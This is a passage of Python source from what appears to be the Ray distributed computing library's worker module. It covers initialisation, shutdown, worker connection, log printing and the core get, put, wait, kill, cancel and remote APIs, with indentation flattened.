# Rewrite the URI. Note the package isn't uploaded to the URI until
# later in the connect.
working_dir_pkg.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data["pid"] in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data["actor_name"]:
res = data["actor_name"] + " " + res
elif data["task_name"]:
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data["pid"] == "raylet":
return colorama.Fore.YELLOW
elif data["pid"] == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data["pid"] == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data["lines"])
else:
pid = data["pid"]
lines = data["lines"]
if data["ip"] == data["localhost"]:
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(
colorama.Style.DIM, color_for(data), prefix_for(data), pid,
data["ip"], colorama.Style.RESET_ALL, line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid)
worker.gcs_client = worker.core_worker.get_gcs_client()
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
manager = working_dir_pkg.WorkingDirManager(
worker.node.get_runtime_env_dir_path())
manager.upload_runtime_env_package_if_needed(job_config)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
worker=None,
retry_exceptions=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries, runtime_env)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
